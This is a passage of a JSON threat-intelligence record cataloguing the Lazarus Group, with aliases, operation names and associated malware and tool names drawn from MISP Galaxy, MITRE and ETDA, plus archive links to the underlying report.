"Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434501, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f5d2a4fefd726cf1f371446b00cc2bad32e15737.pdf", "text": "https://archive.orkl.eu/f5d2a4fefd726cf1f371446b00cc2bad32e15737.txt", "img": "https://archive.orkl.eu/f5d2a4fefd726cf1f371446b00cc2bad32e15737.jpg" } }